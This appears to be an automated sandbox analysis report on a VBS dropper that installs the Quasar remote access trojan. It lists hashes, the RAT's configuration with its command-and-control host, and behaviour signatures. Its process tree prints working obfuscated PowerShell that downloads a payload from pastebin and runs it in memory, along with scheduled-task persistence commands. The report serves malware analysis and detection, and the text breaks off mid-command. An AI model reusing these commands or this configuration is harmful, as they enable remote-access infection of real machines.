Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230621-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230621-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    01/07/2023, 01:07 UTC

General

  • Target

    77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs

  • Size

    213KB

  • MD5

    2ee3aa9bc2da3fce27fe025356ae13b1

  • SHA1

    d6c9f20fbfef8b1dca77e002c4ad2b9f7cad13c5

  • SHA256

    77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1

  • SHA512

    44d12a96f0c6ab16de52ebaae017f4e5e755831bfc9fe4704c560cb92f31f520737cf60949e89ea9e79bd744fa2065a0b29d90d4a033404e3fbdcf1c974b1f28

  • SSDEEP

    3072:u5d6525555555e555555555555p5555+Ji555tp:R

Malware Config

Extracted

Language
ps1
Deobfuscated
$rrjho = "01234"
$muwth = "C:\\Users\\Admin\\AppData\\Local\\Temp\\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs"
[byte[]]$buofc = [system.convert]::frombase64string((new-object net.webclient).downloadstring((new-object net.webclient).downloadstring("https://pastebin.com/raw/16APD4C6")))
(((([system.appdomain]::currentdomain).load($buofc)).gettype("CdWDdB.DKeSvl")).getmethod("NnIaUq")).invoke($null, [object[]]"li7fniwy6bqx/daolnwod/moc.oietsap//:sptth", $muwth, "eyUWM", $rrjho, "1", "Roda")
URLs
ps1.dropper

https://pastebin.com/raw/16APD4C6

Extracted

Family

quasar

Version

1.3.0.0

Botnet

ACS hope

C2

crazydns.linkpc.net:26133

Mutex

QSR_MUTEX_6iGAmxpR39hpOQEFqk

Attributes
  • encryption_key

    qiJ37BhO6EEtAoSo8ukb

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 12 IoCs
  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 62 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3080
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J‱By‱HI‱agBo‱G8‱I‱‱9‱C‱‱Jw‱w‱DE‱Mg‱z‱DQ‱Jw‱7‱CQ‱bQB1‱Hc‱d‱Bo‱C‱‱PQ‱g‱Cc‱JQBw‱Ho‱QQBj‱E8‱ZwBJ‱G4‱TQBy‱CU‱Jw‱7‱Fs‱QgB5‱HQ‱ZQBb‱F0‱XQ‱g‱CQ‱YgB1‱G8‱ZgBj‱C‱‱PQ‱g‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBD‱G8‱bgB2‱GU‱cgB0‱F0‱Og‱6‱EY‱cgBv‱G0‱QgBh‱HM‱ZQ‱2‱DQ‱UwB0‱HI‱aQBu‱Gc‱K‱‱g‱Cg‱TgBl‱Hc‱LQBP‱GI‱agBl‱GM‱d‱‱g‱E4‱ZQB0‱C4‱VwBl‱GI‱QwBs‱Gk‱ZQBu‱HQ‱KQ‱u‱EQ‱bwB3‱G4‱b‱Bv‱GE‱Z‱BT‱HQ‱cgBp‱G4‱Zw‱o‱C‱‱K‱BO‱GU‱dw‱t‱E8‱YgBq‱GU‱YwB0‱C‱‱TgBl‱HQ‱LgBX‱GU‱YgBD‱Gw‱aQBl‱G4‱d‱‱p‱C4‱R‱Bv‱Hc‱bgBs‱G8‱YQBk‱FM‱d‱By‱Gk‱bgBn‱Cg‱JwBo‱HQ‱d‱Bw‱HM‱Og‱v‱C8‱c‱Bh‱HM‱d‱Bl‱GI‱aQBu‱C4‱YwBv‱G0‱LwBy‱GE‱dw‱v‱DE‱NgBB‱F‱‱R‱‱0‱EM‱Ng‱n‱Ck‱I‱‱p‱C‱‱KQ‱7‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBB‱H‱‱c‱BE‱G8‱bQBh‱Gk‱bgBd‱Do‱OgBD‱HU‱cgBy‱GU‱bgB0‱EQ‱bwBt‱GE‱aQBu‱C4‱T‱Bv‱GE‱Z‱‱o‱CQ‱YgB1‱G8‱ZgBj‱Ck‱LgBH‱GU‱d‱BU‱Hk‱c‱Bl‱Cg‱JwBD‱GQ‱VwBE‱GQ‱Qg‱u‱EQ‱SwBl‱FM‱dgBs‱Cc‱KQ‱u‱Ec‱ZQB0‱E0‱ZQB0‱Gg‱bwBk‱Cg‱JwBO‱G4‱SQBh‱FU‱cQ‱n‱Ck‱LgBJ‱G4‱dgBv‱Gs‱ZQ‱o‱CQ‱bgB1‱Gw‱b‱‱s‱C‱‱WwBv‱GI‱agBl‱GM‱d‱Bb‱F0‱XQ‱g‱Cg‱JwBs‱Gk‱NwBm‱G4‱aQB3‱Hk‱NgBi‱HE‱e‱‱v‱GQ‱YQBv‱Gw‱bgB3‱G8‱Z‱‱v‱G0‱bwBj‱C4‱bwBp‱GU‱d‱Bz‱GE‱c‱‱v‱C8‱OgBz‱H‱‱d‱B0‱Gg‱Jw‱g‱Cw‱I‱‱k‱G0‱dQB3‱HQ‱a‱‱g‱Cw‱I‱‱n‱GU‱eQBV‱Fc‱TQ‱n‱Cw‱I‱‱k‱HI‱cgBq‱Gg‱bw‱s‱C‱‱Jw‱x‱Cc‱L‱‱g‱Cc‱UgBv‱GQ‱YQ‱n‱C‱‱KQ‱p‱Ds‱';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('‱','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs');powershell -command $KByHL;
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4952
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$rrjho = '01234';$muwth = 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs';[Byte[]] $buofc = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/16APD4C6') ) );[system.AppDomain]::CurrentDomain.Load($buofc).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('li7fniwy6bqx/daolnwod/moc.oietsap//:sptth' , $muwth , 'eyUWM', $rrjho, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4384
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3908
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
            5⤵
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3976
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3472
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1688
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2540
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f
            5⤵
            • Creates scheduled task(s)
            PID:2524
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4960
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          4⤵
            PID:4832
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:3860
    • C:\Windows\system32\wscript.exe
      wscript.exe //b //nologo "C:\Users\Admin\AppData\Local\Temp\xx.vbs"
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1720
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs'
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:400
        • C:\Windows\system32\wscript.exe
          "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:984
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J‱By‱HI‱agBo‱G8‱I‱‱9‱C‱‱Jw‱w‱DE‱Mg‱z‱DQ‱Jw‱7‱CQ‱bQB1‱Hc‱d‱Bo‱C‱‱PQ‱g‱Cc‱JQBw‱Ho‱QQBj‱E8‱ZwBJ‱G4‱TQBy‱CU‱Jw‱7‱Fs‱QgB5‱HQ‱ZQBb‱F0‱XQ‱g‱CQ‱YgB1‱G8‱ZgBj‱C‱‱PQ‱g‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBD‱G8‱bgB2‱GU‱cgB0‱F0‱Og‱6‱EY‱cgBv‱G0‱QgBh‱HM‱ZQ‱2‱DQ‱UwB0‱HI‱aQBu‱Gc‱K‱‱g‱Cg‱TgBl‱Hc‱LQBP‱GI‱agBl‱GM‱d‱‱g‱E4‱ZQB0‱C4‱VwBl‱GI‱QwBs‱Gk‱ZQBu‱HQ‱KQ‱u‱EQ‱bwB3‱G4‱b‱Bv‱GE‱Z‱BT‱HQ‱cgBp‱G4‱Zw‱o‱C‱‱K‱BO‱GU‱dw‱t‱E8‱YgBq‱GU‱YwB0‱C‱‱TgBl‱HQ‱LgBX‱GU‱YgBD‱Gw‱aQBl‱G4‱d‱‱p‱C4‱R‱Bv‱Hc‱bgBs‱G8‱YQBk‱FM‱d‱By‱Gk‱bgBn‱Cg‱JwBo‱HQ‱d‱Bw‱HM‱Og‱v‱C8‱c‱Bh‱HM‱d‱Bl‱GI‱aQBu‱C4‱YwBv‱G0‱LwBy‱GE‱dw‱v‱DE‱NgBB‱F‱‱R‱‱0‱EM‱Ng‱n‱Ck‱I‱‱p‱C‱‱KQ‱7‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBB‱H‱‱c‱BE‱G8‱bQBh‱Gk‱bgBd‱Do‱OgBD‱HU‱cgBy‱GU‱bgB0‱EQ‱bwBt‱GE‱aQBu‱C4‱T‱Bv‱GE‱Z‱‱o‱CQ‱YgB1‱G8‱ZgBj‱Ck‱LgBH‱GU‱d‱BU‱Hk‱c‱Bl‱Cg‱JwBD‱GQ‱VwBE‱GQ‱Qg‱u‱EQ‱SwBl‱FM‱dgBs‱Cc‱KQ‱u‱Ec‱ZQB0‱E0‱ZQB0‱Gg‱bwBk‱Cg‱JwBO‱G4‱SQBh‱FU‱cQ‱n‱Ck‱LgBJ‱G4‱dgBv‱Gs‱ZQ‱o‱CQ‱bgB1‱Gw‱b‱‱s‱C‱‱WwBv‱GI‱agBl‱GM‱d‱Bb‱F0‱XQ‱g‱Cg‱JwBs‱Gk‱NwBm‱G4‱aQB3‱Hk‱NgBi‱HE‱e‱‱v‱GQ‱YQBv‱Gw‱bgB3‱G8‱Z‱‱v‱G0‱bwBj‱C4‱bwBp‱GU‱d‱Bz‱GE‱c‱‱v‱C8‱OgBz‱H‱‱d‱B0‱Gg‱Jw‱g‱Cw‱I‱‱k‱G0‱dQB3‱HQ‱a‱‱g‱Cw‱I‱‱n‱GU‱eQBV‱Fc‱TQ‱n‱Cw‱I‱‱k‱HI‱cgBq‱Gg‱bw‱s‱C‱‱Jw‱x‱Cc‱L‱‱g‱Cc‱UgBv‱GQ‱YQ‱n‱C‱‱KQ‱p‱Ds‱';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('‱','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs');powershell -command $KByHL;
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4596
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$rrjho = '01234';$muwth = 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs';[Byte[]] $buofc = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/16APD4C6') ) );[system.AppDomain]::CurrentDomain.Load($buofc).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('li7fniwy6bqx/daolnwod/moc.oietsap//:sptth' , $muwth , 'eyUWM', $rrjho, '1', 'Roda' ));"
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4608
    • C:\Windows\system32\wscript.exe
      wscript.exe //b //nologo "C:\Users\Admin\AppData\Local\Temp\xx.vbs"
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1548
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs'
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1844
        • C:\Windows\system32\wscript.exe
          "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2760
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J‱By‱HI‱agBo‱G8‱I‱‱9‱C‱‱Jw‱w‱DE‱Mg‱z‱DQ‱Jw‱7‱CQ‱bQB1‱Hc‱d‱Bo‱C‱‱PQ‱g‱Cc‱JQBw‱Ho‱QQBj‱E8‱ZwBJ‱G4‱TQBy‱CU‱Jw‱7‱Fs‱QgB5‱HQ‱ZQBb‱F0‱XQ‱g‱CQ‱YgB1‱G8‱ZgBj‱C‱‱PQ‱g‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBD‱G8‱bgB2‱GU‱cgB0‱F0‱Og‱6‱EY‱cgBv‱G0‱QgBh‱HM‱ZQ‱2‱DQ‱UwB0‱HI‱aQBu‱Gc‱K‱‱g‱Cg‱TgBl‱Hc‱LQBP‱GI‱agBl‱GM‱d‱‱g‱E4‱ZQB0‱C4‱VwBl‱GI‱QwBs‱Gk‱ZQBu‱HQ‱KQ‱u‱EQ‱bwB3‱G4‱b‱Bv‱GE‱Z‱BT‱HQ‱cgBp‱G4‱Zw‱o‱C‱‱K‱BO‱GU‱dw‱t‱E8‱YgBq‱GU‱YwB0‱C‱‱TgBl‱HQ‱LgBX‱GU‱YgBD‱Gw‱aQBl‱G4‱d‱‱p‱C4‱R‱Bv‱Hc‱bgBs‱G8‱YQBk‱FM‱d‱By‱Gk‱bgBn‱Cg‱JwBo‱HQ‱d‱Bw‱HM‱Og‱v‱C8‱c‱Bh‱HM‱d‱Bl‱GI‱aQBu‱C4‱YwBv‱G0‱LwBy‱GE‱dw‱v‱DE‱NgBB‱F‱‱R‱‱0‱EM‱Ng‱n‱Ck‱I‱‱p‱C‱‱KQ‱7‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBB‱H‱‱c‱BE‱G8‱bQBh‱Gk‱bgBd‱Do‱OgBD‱HU‱cgBy‱GU‱bgB0‱EQ‱bwBt‱GE‱aQBu‱C4‱T‱Bv‱GE‱Z‱‱o‱CQ‱YgB1‱G8‱ZgBj‱Ck‱LgBH‱GU‱d‱BU‱Hk‱c‱Bl‱Cg‱JwBD‱GQ‱VwBE‱GQ‱Qg‱u‱EQ‱SwBl‱FM‱dgBs‱Cc‱KQ‱u‱Ec‱ZQB0‱E0‱ZQB0‱Gg‱bwBk‱Cg‱JwBO‱G4‱SQBh‱FU‱cQ‱n‱Ck‱LgBJ‱G4‱dgBv‱Gs‱ZQ‱o‱CQ‱bgB1‱Gw‱b‱‱s‱C‱‱WwBv‱GI‱agBl‱GM‱d‱Bb‱F0‱XQ‱g‱Cg‱JwBs‱Gk‱NwBm‱G4‱aQB3‱Hk‱NgBi‱HE‱e‱‱v‱GQ‱YQBv‱Gw‱bgB3‱G8‱Z‱‱v‱G0‱bwBj‱C4‱bwBp‱GU‱d‱Bz‱GE‱c‱‱v‱C8‱OgBz‱H‱‱d‱B0‱Gg‱Jw‱g‱Cw‱I‱‱k‱G0‱dQB3‱HQ‱a‱‱g‱Cw‱I‱‱n‱GU‱eQBV‱Fc‱TQ‱n‱Cw‱I‱‱k‱HI‱cgBq‱Gg‱bw‱s‱C‱‱Jw‱x‱Cc‱L‱‱g‱Cc‱UgBv‱GQ‱YQ‱n‱C‱‱KQ‱p‱Ds‱';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('‱','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs');powershell -command $KByHL;
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:632
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$rrjho = '01234';$muwth = 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs';[Byte[]] $buofc = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/16APD4C6') ) );[system.AppDomain]::CurrentDomain.Load($buofc).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('li7fniwy6bqx/daolnwod/moc.oietsap//:sptth' , $muwth , 'eyUWM', $rrjho, '1', 'Roda' ));"
              5⤵
              • Blocklisted process makes network request
              • Drops startup file
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:5036
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4756
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
                  7⤵
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4352
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1228
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2060
              • C:\Windows\system32\cmd.exe
                cmd.exe /c schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f & exit
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4272
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f
                  7⤵
                  • Creates scheduled task(s)
                  PID:652
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4968
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                6⤵
                  PID:2004
      • C:\Windows\system32\wscript.exe
        wscript.exe //b //nologo "C:\Users\Admin\AppData\Local\Temp\xx.vbs"
        1⤵
        • Checks computer location settings
        PID:4296
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs'
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2264
          • C:\Windows\system32\wscript.exe
            "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs
            3⤵
            • Checks computer location settings
            PID:3900
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J‱By‱HI‱agBo‱G8‱I‱‱9‱C‱‱Jw‱w‱DE‱Mg‱z‱DQ‱Jw‱7‱CQ‱bQB1‱Hc‱d‱Bo‱C‱‱PQ‱g‱Cc‱JQBw‱Ho‱QQBj‱E8‱ZwBJ‱G4‱TQBy‱CU‱Jw‱7‱Fs‱QgB5‱HQ‱ZQBb‱F0‱XQ‱g‱CQ‱YgB1‱G8‱ZgBj‱C‱‱PQ‱g‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBD‱G8‱bgB2‱GU‱cgB0‱F0‱Og‱6‱EY‱cgBv‱G0‱QgBh‱HM‱ZQ‱2‱DQ‱UwB0‱HI‱aQBu‱Gc‱K‱‱g‱Cg‱TgBl‱Hc‱LQBP‱GI‱agBl‱GM‱d‱‱g‱E4‱ZQB0‱C4‱VwBl‱GI‱QwBs‱Gk‱ZQBu‱HQ‱KQ‱u‱EQ‱bwB3‱G4‱b‱Bv‱GE‱Z‱BT‱HQ‱cgBp‱G4‱Zw‱o‱C‱‱K‱BO‱GU‱dw‱t‱E8‱YgBq‱GU‱YwB0‱C‱‱TgBl‱HQ‱LgBX‱GU‱YgBD‱Gw‱aQBl‱G4‱d‱‱p‱C4‱R‱Bv‱Hc‱bgBs‱G8‱YQBk‱FM‱d‱By‱Gk‱bgBn‱Cg‱JwBo‱HQ‱d‱Bw‱HM‱Og‱v‱C8‱c‱Bh‱HM‱d‱Bl‱GI‱aQBu‱C4‱YwBv‱G0‱LwBy‱GE‱dw‱v‱DE‱NgBB‱F‱‱R‱‱0‱EM‱Ng‱n‱Ck‱I‱‱p‱C‱‱KQ‱7‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBB‱H‱‱c‱BE‱G8‱bQBh‱Gk‱bgBd‱Do‱OgBD‱HU‱cgBy‱GU‱bgB0‱EQ‱bwBt‱GE‱aQBu‱C4‱T‱Bv‱GE‱Z‱‱o‱CQ‱YgB1‱G8‱ZgBj‱Ck‱LgBH‱GU‱d‱BU‱Hk‱c‱Bl‱Cg‱JwBD‱GQ‱VwBE‱GQ‱Qg‱u‱EQ‱SwBl‱FM‱dgBs‱Cc‱KQ‱u‱Ec‱ZQB0‱E0‱ZQB0‱Gg‱bwBk‱Cg‱JwBO‱G4‱SQBh‱FU‱cQ‱n‱Ck‱LgBJ‱G4‱dgBv‱Gs‱ZQ‱o‱CQ‱bgB1‱Gw‱b‱‱s‱C‱‱WwBv‱GI‱agBl‱GM‱d‱Bb‱F0‱XQ‱g‱Cg‱JwBs‱Gk‱NwBm‱G4‱aQB3‱Hk‱NgBi‱HE‱e‱‱v‱GQ‱YQBv‱Gw‱bgB3‱G8‱Z‱‱v‱G0‱bwBj‱C4‱bwBp‱GU‱d‱Bz‱GE‱c‱‱v‱C8‱OgBz‱H‱‱d‱B0‱Gg‱Jw‱g‱Cw‱I‱‱k‱G0‱dQB3‱HQ‱a‱‱g‱Cw‱I‱‱n‱GU‱eQBV‱Fc‱TQ‱n‱Cw‱I‱‱k‱HI‱cgBq‱Gg‱bw‱s‱C‱‱Jw‱x‱Cc‱L‱‱g‱Cc‱UgBv‱GQ‱YQ‱n‱C‱‱KQ‱p‱Ds‱';$KB